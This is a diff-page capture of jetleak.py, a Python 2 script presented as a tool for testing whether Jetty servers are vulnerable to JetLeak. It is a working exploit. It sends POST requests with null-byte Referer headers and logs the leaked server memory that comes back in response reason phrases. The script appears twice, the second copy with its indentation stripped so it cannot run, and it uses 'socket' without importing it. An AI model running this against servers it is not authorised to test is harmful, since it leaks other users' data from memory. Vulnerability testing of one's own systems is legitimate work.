streaak · April 2, 2018 18:33 · jatan77 · May 8, 2020
diff --git a/jetleak.py b/jetleak.py
 import httplib, urllib, ssl, string, sys, getopt
 import datetime
 from urlparse import urlparse

 f = open('jetleak_' + datetime.datetime.now().strftime('%Y%m%d_%H_%M') + '.txt', 'w')

 '''
 Author: Gotham Digital Science, modified by molejarka
 Purpose: This tool is intended to provide a quick-and-dirty way for organizations to test whether 
 		 their Jetty web server versions are vulnerable to JetLeak. Currently, this script does 
 		 not handle sites with invalid SSL certs. This will be fixed in a future iteration.
 '''

 if len(sys.argv) < 3:
 	print("Usage: jetleak.py [url] [port]")
 	sys.exit(1)

 url = urlparse(sys.argv[1])
 if url.scheme == '' and url.netloc == '':
 	print("Error: Invalid URL Entered.")
 	sys.exit(1)

 port = sys.argv[2]

 conn = None

 if url.scheme == "https":
 	conn = httplib.HTTPSConnection(url.netloc + ":" + port)
 elif url.scheme == "http":
    conn = httplib.HTTPConnection(url.netloc + ":" + port)
 else: 
 	print("Error: Only 'http' or 'https' URL Schemes Supported")
 	sys.exit(1)
 	
 b = 4

 for j in range(1,350):

 	for i in range(1,2):
 		try:
 			results = []
 			
 			x = chr(0) * (1 + b * j)
 			headers = {"Referer": x}
 			conn.request("POST", "/", "", headers)
 			r1 = conn.getresponse()

 			r1.read()
 			results.append(r1.reason[221:-64])
 		
 			results = list(set(results))
 			for r in results:
 				print(r)
 				f.write(r + '\n')

 		except socket.error:
 			if url.scheme == "https":
 				conn = httplib.HTTPSConnection(url.netloc + ":" + port)
 			elif url.scheme == "http":
 				conn = httplib.HTTPConnection(url.netloc + ":" + port)
 			
 				
 f.close()
	import httplib, urllib, ssl, string, sys, getopt
	import datetime
	from urlparse import urlparse

	f = open('jetleak_' + datetime.datetime.now().strftime('%Y%m%d_%H_%M') + '.txt', 'w')

	'''
	Author: Gotham Digital Science, modified by molejarka
	Purpose: This tool is intended to provide a quick-and-dirty way for organizations to test whether
	their Jetty web server versions are vulnerable to JetLeak. Currently, this script does
	not handle sites with invalid SSL certs. This will be fixed in a future iteration.
	'''

	if len(sys.argv) < 3:
	print("Usage: jetleak.py [url] [port]")
	sys.exit(1)

	url = urlparse(sys.argv[1])
	if url.scheme == '' and url.netloc == '':
	print("Error: Invalid URL Entered.")
	sys.exit(1)

	port = sys.argv[2]

	conn = None

	if url.scheme == "https":
	conn = httplib.HTTPSConnection(url.netloc + ":" + port)
	elif url.scheme == "http":
	conn = httplib.HTTPConnection(url.netloc + ":" + port)
	else:
	print("Error: Only 'http' or 'https' URL Schemes Supported")
	sys.exit(1)

	b = 4

	for j in range(1,350):

	for i in range(1,2):
	try:
	results = []

	x = chr(0) * (1 + b * j)
	headers = {"Referer": x}
	conn.request("POST", "/", "", headers)
	r1 = conn.getresponse()

	r1.read()
	results.append(r1.reason[221:-64])

	results = list(set(results))
	for r in results:
	print(r)
	f.write(r + '\n')

	except socket.error:
	if url.scheme == "https":
	conn = httplib.HTTPSConnection(url.netloc + ":" + port)
	elif url.scheme == "http":
	conn = httplib.HTTPConnection(url.netloc + ":" + port)


	f.close()